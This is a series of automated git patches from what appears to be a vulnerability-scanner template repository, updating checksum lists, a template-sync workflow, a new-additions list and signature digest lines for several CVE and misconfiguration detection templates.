http/cves/2024/CVE-2024-3822.yaml:2dd9c56b09c0619afb49b80cbcb5979b3eae5a1c http/cves/2024/CVE-2024-3922.yaml:768a5cb24e6893fee27193eda765eeeaedae2a21 +http/cves/2024/CVE-2024-39250.yaml:ab69f9e42568d8c63ad0a25293f32de1b3b1eae0 http/cves/2024/CVE-2024-40348.yaml:e1b3c7bd1bfe293d155f1999f412eee670c8334b http/cves/2024/CVE-2024-4040.yaml:87622a19f81053e7b7bfdf1fdce706db759cc310 http/cves/2024/CVE-2024-4257.yaml:76768a186c284a20129bc8f67a2c620f8c1fc7ac @@ -8923,7 +8924,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:bfc5659d46618f3685f0003bd0c2479905b58c67 +templates-checksum.txt:ced8b1a8c058e2ec82dfafca3b8f722e76327ef4 vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From 312ad2abf1ccdcec0cf75f5ac6c26011b3b6cd91 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 25 Jul 2024 12:50:46 +0000 Subject: [PATCH 1642/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index a7b912601a..48d660c00c 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -22,6 +22,7 @@ on: - 'http/cves/2024/CVE-2024-34351.yaml' - 'http/cves/2024/CVE-2024-3742.yaml' - 'http/cves/2024/CVE-2024-37843.yaml' + - 'http/cves/2024/CVE-2024-39250.yaml' - 'http/cves/2024/CVE-2024-40348.yaml' - 'http/cves/2024/CVE-2024-4257.yaml' - 'http/cves/2024/CVE-2024-4295.yaml' From 20b33fb7af1e9279e2e0de3fe9cd0e42b3149140 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 25 Jul 2024 12:51:00 +0000 Subject: [PATCH 1643/1841] Auto Template Signing [Thu Jul 25 12:51:00 UTC 2024] :robot: --- dast/vulnerabilities/xxe/generic-xxe.yaml | 2 +- http/technologies/apache/apache-gravitino-detect.yaml | 1 + 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/dast/vulnerabilities/xxe/generic-xxe.yaml b/dast/vulnerabilities/xxe/generic-xxe.yaml index ecd44c93e3..86922a7bb4 100644 --- a/dast/vulnerabilities/xxe/generic-xxe.yaml +++ b/dast/vulnerabilities/xxe/generic-xxe.yaml @@ -56,4 +56,4 @@ http: part: interactsh_protocol words: - "http" -# digest: 490a0046304402200765457e7ce86f2875c9b0446d1e4d4a3f035e95c8cb70d2c685bed047e1883c022000fb0dbfce1acce174129de4808904972d457aae4cc27dd68672d8e5a14d49b1:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100fc0d6d7e83a8c8d79bdd40f6ee0f749ce6fa2cb1c21a9512b043af0fbf2f37980220225bcf70bc1a1a1a46791f3707b12a5c302d1a9da94851d2c33e450749551c76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/apache/apache-gravitino-detect.yaml b/http/technologies/apache/apache-gravitino-detect.yaml index 8446f9384f..6d8e4d59a0 100644 --- a/http/technologies/apache/apache-gravitino-detect.yaml +++ b/http/technologies/apache/apache-gravitino-detect.yaml @@ -27,3 +27,4 @@ http: - type: status status: - 200 +# digest: 4b0a0048304602210095884937207db886a1eb80dcfb9e79954e713504b0ee7a34a078aa86617c3c05022100c5a0fd536b800b4b286cb0ca17ebbdbdcdbb71e32580246ce9b2cb46b1c73d04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From a3b197359f1d8884324639cb20999e5c0e5fcbd8 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 25 Jul 2024 12:55:06 +0000 Subject: [PATCH 1644/1841] Auto Generated New Template Addition List [Thu Jul 25 12:55:05 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 3f072f024e..cf404e66cf 100644 --- a/.new-additions +++ b/.new-additions @@ -50,6 +50,7 @@ http/technologies/apache/apache-gravitino-detect.yaml http/technologies/apache/apache-ozone-detect.yaml http/technologies/wordpress/plugins/fluent-smtp.yaml http/technologies/wordpress/plugins/wp-crontrol.yaml +http/vulnerabilities/hikvision/hikvision-isecure-info-leak.yaml http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml http/vulnerabilities/other/jan-file-upload.yaml From 46ee89b439747965af35b64c0071b852481bc741 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 25 Jul 2024 12:55:18 +0000 Subject: [PATCH 1645/1841] Auto Generated Templates Checksum [Thu Jul 25 12:55:18 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 86a6700e31..3b77625972 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -249,7 +249,7 @@ dast/vulnerabilities/ssrf/response-ssrf.yaml:104def6ff82e4dcfc88917f98403bea903e dast/vulnerabilities/ssti/reflection-ssti.yaml:cfefbcfec9ce4e1de812f0409c4a2461a4a7b851 dast/vulnerabilities/xss/dom-xss.yaml:397dd3f854c47a0aadd92ad3a9fc93aa77ec5253 dast/vulnerabilities/xss/reflected-xss.yaml:46717ee593fe9809385572b82e9b1a7265c3cf6f -dast/vulnerabilities/xxe/generic-xxe.yaml:6b0d9de54a6fd786acccd9b247da23b36ea0ccf0 +dast/vulnerabilities/xxe/generic-xxe.yaml:d803e0d74fa83905be163e717878cc00b647a58b dns/azure-takeover-detection.yaml:5295c90a6fa66f513eca7f6f30eee8745a41aa0a dns/bimi-detect.yaml:bde903bfbcd370747978534ce2391131b12b08f0 dns/caa-fingerprint.yaml:71845ba0a32b1968e23b507166275ee4c1f84b24 @@ -6931,7 +6931,7 @@ http/technologies/apache/apache-cloudstack-detect.yaml:c08888a73f19a2dd082a7a928 http/technologies/apache/apache-cocoon-detect.yaml:773bd2977ddbb3403acfcd0f8e4cf10c81b84495 http/technologies/apache/apache-detect.yaml:1ec0c234a8a4487c59726af437b6eaa1fa249507 http/technologies/apache/apache-dubbo-detect.yaml:454eb1d29924d2b5f4a9f6765d3062646950f91a -http/technologies/apache/apache-gravitino-detect.yaml:c5e665af574d1cc4315d9869bc09ecc1ed727f69 +http/technologies/apache/apache-gravitino-detect.yaml:d161c9066c256afd0680c7efdb6c3e5bf7233819 http/technologies/apache/apache-guacamole.yaml:8c7975c569769ee074f51307e0d963b816e631aa http/technologies/apache/apache-karaf-panel.yaml:50fa0b20105a0786c5ce5ddce7aa5c49237bfafa http/technologies/apache/apache-ozone-detect.yaml:a06d145bb51dd1d87c14bc151843fdf8c5ef7285 @@ -7903,6 +7903,7 @@ http/vulnerabilities/gradio/gradio-lfi.yaml:9d052b9053b30850ed2b42140a4e54ba3371 http/vulnerabilities/gradio/gradio-ssrf.yaml:c0a20caa4fb295071efb720890b54bee093c0fda http/vulnerabilities/grafana/grafana-file-read.yaml:7f8fa8a6408dbbd25e7c33bc203024a131b85704 http/vulnerabilities/hikvision/hikvision-fastjson-rce.yaml:02a334888358c47036d90f4d0fff958976da7f5f +http/vulnerabilities/hikvision/hikvision-isecure-info-leak.yaml:3c937311e797d4edd3ddcd6585f9976ee055062f http/vulnerabilities/hikvision/hikvision-ivms-file-upload-bypass.yaml:bc54a4c9f7771c524140f1840157c03bf4651a54 http/vulnerabilities/hikvision/hikvision-ivms-file-upload-rce.yaml:94de4453e34e7b36379a10dc4966aa54f3582aeb http/vulnerabilities/hikvision/hikvision-js-files-upload.yaml:cdcf6ca5518af130ebd36c1531365f6bb79001c5 @@ -8924,7 +8925,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:ced8b1a8c058e2ec82dfafca3b8f722e76327ef4 +templates-checksum.txt:83740967c1d3b5a2ddbd6706c217af1b6d0ca1a6 vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From cd186c58dc0397d700a0f12299f3f9f56f2675df Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 25 Jul 2024 12:55:57 +0000 Subject: [PATCH 1646/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 48d660c00c..ec800e1891 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -55,6 +55,7 @@ on: - 'http/technologies/apache/apache-ozone-detect.yaml' - 'http/technologies/wordpress/plugins/fluent-smtp.yaml' - 'http/technologies/wordpress/plugins/wp-crontrol.yaml' + - 'http/vulnerabilities/hikvision/hikvision-isecure-info-leak.yaml' - 'http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml' - 'http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml' - 'http/vulnerabilities/other/jan-file-upload.yaml' From 835ed44ca35315fdd8e03db9e671f7aee875f488 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 25 Jul 2024 12:56:56 +0000 Subject: [PATCH 1647/1841] Auto Template Signing [Thu Jul 25 12:56:56 UTC 2024] :robot: --- http/cves/2024/CVE-2024-39250.yaml | 1 + http/vulnerabilities/hikvision/hikvision-isecure-info-leak.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/cves/2024/CVE-2024-39250.yaml b/http/cves/2024/CVE-2024-39250.yaml index 5df77304a2..c8471b2316 100644 --- a/http/cves/2024/CVE-2024-39250.yaml +++ b/http/cves/2024/CVE-2024-39250.yaml @@ -49,3 +49,4 @@ http: - 'contains(content_type, "text/html")' - 'status_code == 500' condition: and +# digest: 4a0a00473045022066aa1139efa896b1ff2d92fa0b8320c4449e8b7b3f74ea7a954e30825c32a568022100cf323de98b87fd1b4aa2a2c8579328f248d5f45980d3ecd7348d1ff9beac66d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/hikvision/hikvision-isecure-info-leak.yaml b/http/vulnerabilities/hikvision/hikvision-isecure-info-leak.yaml index 671e54881d..6bb32ced71 100644 --- a/http/vulnerabilities/hikvision/hikvision-isecure-info-leak.yaml +++ b/http/vulnerabilities/hikvision/hikvision-isecure-info-leak.yaml @@ -33,3 +33,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022005b0e92f0ddbd6578fdc149b7eddf7d5c091a38bc7c69b0656e01ab04a189bb0022100e879f64938e3b6988168267fc153650ad248adc382337e296a7ed7afb074b6f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From f86bf62246c47006611c436ace0c0d25d63180ec Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 25 Jul 2024 12:58:04 +0000 Subject: [PATCH 1648/1841] Auto Generated New Template Addition List [Thu Jul 25 12:58:04 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index cf404e66cf..03705f6c79 100644 --- a/.new-additions +++ b/.new-additions @@ -18,6 +18,7 @@ http/cves/2024/CVE-2024-34351.yaml http/cves/2024/CVE-2024-3742.yaml http/cves/2024/CVE-2024-37843.yaml http/cves/2024/CVE-2024-39250.yaml +http/cves/2024/CVE-2024-39914.yaml http/cves/2024/CVE-2024-40348.yaml http/cves/2024/CVE-2024-4257.yaml http/cves/2024/CVE-2024-4295.yaml From 86f209120e36c64ce115ee227dfc83e2e5fdec0a Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 25 Jul 2024 12:58:10 +0000 Subject: [PATCH 1649/1841] Auto Generated Templates Checksum [Thu Jul 25 12:58:10 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 3b77625972..569a74f1d3 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3501,7 +3501,8 @@ http/cves/2024/CVE-2024-37843.yaml:bc236163373e7c3621139f152cb99b39b9a231c7 http/cves/2024/CVE-2024-37881.yaml:060af3bf51e4ab05684d4923658d02b3c49583bb http/cves/2024/CVE-2024-3822.yaml:2dd9c56b09c0619afb49b80cbcb5979b3eae5a1c http/cves/2024/CVE-2024-3922.yaml:768a5cb24e6893fee27193eda765eeeaedae2a21 -http/cves/2024/CVE-2024-39250.yaml:ab69f9e42568d8c63ad0a25293f32de1b3b1eae0 +http/cves/2024/CVE-2024-39250.yaml:ff485ce5537d94dfd260abb578b3c4d85ecb3797 +http/cves/2024/CVE-2024-39914.yaml:c87811d8d8bcc811990ceb0e5bba68f1aa9a216c http/cves/2024/CVE-2024-40348.yaml:e1b3c7bd1bfe293d155f1999f412eee670c8334b http/cves/2024/CVE-2024-4040.yaml:87622a19f81053e7b7bfdf1fdce706db759cc310 http/cves/2024/CVE-2024-4257.yaml:76768a186c284a20129bc8f67a2c620f8c1fc7ac @@ -7903,7 +7904,7 @@ http/vulnerabilities/gradio/gradio-lfi.yaml:9d052b9053b30850ed2b42140a4e54ba3371 http/vulnerabilities/gradio/gradio-ssrf.yaml:c0a20caa4fb295071efb720890b54bee093c0fda http/vulnerabilities/grafana/grafana-file-read.yaml:7f8fa8a6408dbbd25e7c33bc203024a131b85704 http/vulnerabilities/hikvision/hikvision-fastjson-rce.yaml:02a334888358c47036d90f4d0fff958976da7f5f -http/vulnerabilities/hikvision/hikvision-isecure-info-leak.yaml:3c937311e797d4edd3ddcd6585f9976ee055062f +http/vulnerabilities/hikvision/hikvision-isecure-info-leak.yaml:d4a5f3853a70adea141b8d68ee9a7c2d6ef44545 http/vulnerabilities/hikvision/hikvision-ivms-file-upload-bypass.yaml:bc54a4c9f7771c524140f1840157c03bf4651a54 http/vulnerabilities/hikvision/hikvision-ivms-file-upload-rce.yaml:94de4453e34e7b36379a10dc4966aa54f3582aeb http/vulnerabilities/hikvision/hikvision-js-files-upload.yaml:cdcf6ca5518af130ebd36c1531365f6bb79001c5 @@ -8925,7 +8926,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:83740967c1d3b5a2ddbd6706c217af1b6d0ca1a6 +templates-checksum.txt:23d8c75d9486fb9928640b7e3aeca5a799308c80 vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From 1fcba2439dd978cae86433179fe1b7508ec884e0 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 25 Jul 2024 12:58:52 +0000 Subject: [PATCH 1650/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index ec800e1891..1c8f4a4d8c 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -23,6 +23,7 @@ on: - 'http/cves/2024/CVE-2024-3742.yaml' - 'http/cves/2024/CVE-2024-37843.yaml' - 'http/cves/2024/CVE-2024-39250.yaml' + - 'http/cves/2024/CVE-2024-39914.yaml' - 'http/cves/2024/CVE-2024-40348.yaml' - 'http/cves/2024/CVE-2024-4257.yaml' - 'http/cves/2024/CVE-2024-4295.yaml' From c840a33872bdc1c176aeb883875b1e093eaad004 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 25 Jul 2024 12:58:56 +0000 Subject: [PATCH 1651/1841] Auto Generated Templates Checksum [Thu Jul 25 12:58:56 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 569a74f1d3..37027fec76 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -6003,6 +6003,7 @@ http/misconfiguration/springboot/springboot-threaddump.yaml:c47af0dade8ae96dd8b3 http/misconfiguration/springboot/springboot-trace.yaml:a9e0cdf03cba6bd28b52ad7e2ab0174745c638da http/misconfiguration/sql-server-report-viewer.yaml:cce6309b5b0a456fa34db30015e028db0b81f0be http/misconfiguration/ssrf-via-oauth-misconfig.yaml:1e1ec614f023cbb22a5c7bf5eed4e3c3ffe272f6 +http/misconfiguration/ssrpm-arbitrary-password-reset.yaml:4413a1c2a718d1ddf9b8aaf14c81cbd48adc493a http/misconfiguration/struts-ognl-console.yaml:f32871fc3e05d8a7901b9a4d873b0ca9f77ab646 http/misconfiguration/symfony-debug.yaml:3bee3431aa9041e36dab6a3f95fd67af5bf23454 http/misconfiguration/symfony-fosjrouting-bundle.yaml:e246351ce97fbf8db877bf81e95ed713cae4bed4 @@ -8926,7 +8927,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:23d8c75d9486fb9928640b7e3aeca5a799308c80 +templates-checksum.txt:352ff181613b3b649ab964f9ae2ab78de2d583a4 vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From 465e4228c39433a68e9da488e017eb7af6f2d388 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 25 Jul 2024 12:59:54 +0000 Subject: [PATCH 1652/1841] Auto Template Signing [Thu Jul 25 12:59:54 UTC 2024] :robot: --- http/cves/2024/CVE-2024-39914.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-39914.yaml b/http/cves/2024/CVE-2024-39914.yaml index baae0d8e9f..2df75fa51f 100644 --- a/http/cves/2024/CVE-2024-39914.yaml +++ b/http/cves/2024/CVE-2024-39914.yaml @@ -61,3 +61,4 @@ http: - 'contains(content_type, "text/html")' - 'status_code == 200' condition: and +# digest: 4a0a00473045022075ee2c37d4da90160d134db9e8e9df85d9b449f9095211cc0cb9371aac4dcf53022100de284762c25011f52d379931b93129ff859eb86b044cc0954ea631adfb0b4844:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 7ad86d5a65ab0ad073204488a22491117afe2ca2 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 25 Jul 2024 13:00:57 +0000 Subject: [PATCH 1653/1841] Auto Generated New Template Addition List [Thu Jul 25 13:00:57 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 03705f6c79..241bf87c95 100644 --- a/.new-additions +++ b/.new-additions @@ -17,6 +17,7 @@ http/cves/2024/CVE-2024-34257.yaml http/cves/2024/CVE-2024-34351.yaml http/cves/2024/CVE-2024-3742.yaml http/cves/2024/CVE-2024-37843.yaml +http/cves/2024/CVE-2024-38289.yaml http/cves/2024/CVE-2024-39250.yaml http/cves/2024/CVE-2024-39914.yaml http/cves/2024/CVE-2024-40348.yaml @@ -47,6 +48,7 @@ http/misconfiguration/installer/freshrss-installer.yaml http/misconfiguration/mongod-exposure.yaml http/misconfiguration/servicenow-title-injection.yaml http/misconfiguration/sftpgo-admin-setup.yaml +http/misconfiguration/ssrpm-arbitrary-password-reset.yaml http/technologies/apache/apache-gravitino-detect.yaml http/technologies/apache/apache-ozone-detect.yaml http/technologies/wordpress/plugins/fluent-smtp.yaml From e652a7eb00c1c9b2dfc7f8cadabb10996b1fd826 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 25 Jul 2024 13:01:06 +0000 Subject: [PATCH 1654/1841] Auto Generated Templates Checksum [Thu Jul 25 13:01:06 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 37027fec76..a20544b14f 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3500,9 +3500,10 @@ http/cves/2024/CVE-2024-3742.yaml:c14a1c00e621d1d77ddf978af6680fc4b05c3aa1 http/cves/2024/CVE-2024-37843.yaml:bc236163373e7c3621139f152cb99b39b9a231c7 http/cves/2024/CVE-2024-37881.yaml:060af3bf51e4ab05684d4923658d02b3c49583bb http/cves/2024/CVE-2024-3822.yaml:2dd9c56b09c0619afb49b80cbcb5979b3eae5a1c +http/cves/2024/CVE-2024-38289.yaml:c6c9991b71e360f1071113d9a5a70fcbd13ad39f http/cves/2024/CVE-2024-3922.yaml:768a5cb24e6893fee27193eda765eeeaedae2a21 http/cves/2024/CVE-2024-39250.yaml:ff485ce5537d94dfd260abb578b3c4d85ecb3797 -http/cves/2024/CVE-2024-39914.yaml:c87811d8d8bcc811990ceb0e5bba68f1aa9a216c +http/cves/2024/CVE-2024-39914.yaml:2c8d9d4637d5806823bcba86390d8646d1db66bf http/cves/2024/CVE-2024-40348.yaml:e1b3c7bd1bfe293d155f1999f412eee670c8334b http/cves/2024/CVE-2024-4040.yaml:87622a19f81053e7b7bfdf1fdce706db759cc310 http/cves/2024/CVE-2024-4257.yaml:76768a186c284a20129bc8f67a2c620f8c1fc7ac @@ -8927,7 +8928,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:352ff181613b3b649ab964f9ae2ab78de2d583a4 +templates-checksum.txt:53359804d4c6ecb74c92a16021742c7182ea19d1 vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From 9f6108f978785166930ab66f1993101e49e22c34 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 25 Jul 2024 13:01:48 +0000 Subject: [PATCH 1655/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 1c8f4a4d8c..60012b925b 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -22,6 +22,7 @@ on: - 'http/cves/2024/CVE-2024-34351.yaml' - 'http/cves/2024/CVE-2024-3742.yaml' - 'http/cves/2024/CVE-2024-37843.yaml' + - 'http/cves/2024/CVE-2024-38289.yaml' - 'http/cves/2024/CVE-2024-39250.yaml' - 'http/cves/2024/CVE-2024-39914.yaml' - 'http/cves/2024/CVE-2024-40348.yaml' @@ -52,6 +53,7 @@ on: - 'http/misconfiguration/mongod-exposure.yaml' - 'http/misconfiguration/servicenow-title-injection.yaml' - 'http/misconfiguration/sftpgo-admin-setup.yaml' + - 'http/misconfiguration/ssrpm-arbitrary-password-reset.yaml' - 'http/technologies/apache/apache-gravitino-detect.yaml' - 'http/technologies/apache/apache-ozone-detect.yaml' - 'http/technologies/wordpress/plugins/fluent-smtp.yaml' From 7f2c06ae9d5b0ff743454a6ce1d9cc9c8ac78a6f Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 25 Jul 2024 13:02:54 +0000 Subject: [PATCH 1656/1841] Auto Template Signing [Thu Jul 25 13:02:53 UTC 2024] :robot: --- http/cves/2024/CVE-2024-38289.yaml | 1 + http/misconfiguration/ssrpm-arbitrary-password-reset.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/cves/2024/CVE-2024-38289.yaml b/http/cves/2024/CVE-2024-38289.yaml index 81ad678b22..49c228bc3a 100644 --- a/http/cves/2024/CVE-2024-38289.yaml +++ b/http/cves/2024/CVE-2024-38289.yaml @@ -41,3 +41,4 @@ http: part: body_2 words: - '<__Status__>FAILED</__Status__>' +# digest: 490a0046304402200529dc5c8778e012e9cbb7ffa30d733dc1c0587b432825bef1f5231c3e8986c30220102ab38598176c7395f39eb02a1ab74dc442f237b847feb8dc497b297446afa6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/ssrpm-arbitrary-password-reset.yaml b/http/misconfiguration/ssrpm-arbitrary-password-reset.yaml index 9de29e84f6..2f20066f77 100644 --- a/http/misconfiguration/ssrpm-arbitrary-password-reset.yaml +++ b/http/misconfiguration/ssrpm-arbitrary-password-reset.yaml @@ -49,3 +49,4 @@ http: - type: kval kval: - string +# digest: 4a0a00473045022050149c259ebd2c53027582dbb9a79dd703cfcfb1ca9357feae23108fe913029e022100ed0ef223ee9d627a4e6d68b56000280be279df21d258df4e07cf298191866c99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From e8c22728ce5a1d8da420a3a81dcd0ad280036006 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 25 Jul 2024 13:03:18 +0000 Subject: [PATCH 1657/1841] Auto Generated New Template Addition List [Thu Jul 25 13:03:18 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 241bf87c95..3c5a1d69ea 100644 --- a/.new-additions +++ b/.new-additions @@ -26,6 +26,7 @@ http/cves/2024/CVE-2024-4295.yaml http/cves/2024/CVE-2024-4879.yaml http/cves/2024/CVE-2024-4885.yaml http/cves/2024/CVE-2024-5217.yaml +http/cves/2024/CVE-2024-5315.yaml http/cves/2024/CVE-2024-6289.yaml http/cves/2024/CVE-2024-6587.yaml http/cves/2024/CVE-2024-6646.yaml From 33da5e9ef9473f05e5303e3b0e08c725963659ff Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 25 Jul 2024 13:03:27 +0000 Subject: [PATCH 1658/1841] Auto Generated Templates Checksum [Thu Jul 25 13:03:27 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index a20544b14f..cc0baf76d0 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3520,6 +3520,7 @@ http/cves/2024/CVE-2024-4956.yaml:c6be2d64ff4b985c30acc88c57c66d57a846d25a http/cves/2024/CVE-2024-5084.yaml:8ede90fad7058c4a2a7499562f98cacae32ede68 http/cves/2024/CVE-2024-5217.yaml:cf2d874cba1069c15371fe16a5ede176ba0bfae7 http/cves/2024/CVE-2024-5230.yaml:8b073f5f6aa9e22b66403c2c6297fb487fbade0c +http/cves/2024/CVE-2024-5315.yaml:6faf9f7e543e47415ad0c0bccceb162b6d590489 http/cves/2024/CVE-2024-5522.yaml:1aae46b20c03316823691aa8755eb8e35b46533a http/cves/2024/CVE-2024-5947.yaml:1007c228fb459bf995a9b759b10c668e190ab1e6 http/cves/2024/CVE-2024-6028.yaml:5bb353f3acbac441334cb7219e4198515178e991 @@ -8928,7 +8929,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:53359804d4c6ecb74c92a16021742c7182ea19d1 +templates-checksum.txt:00e78793f9b81f4609f8edff1855dc716dced779 vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 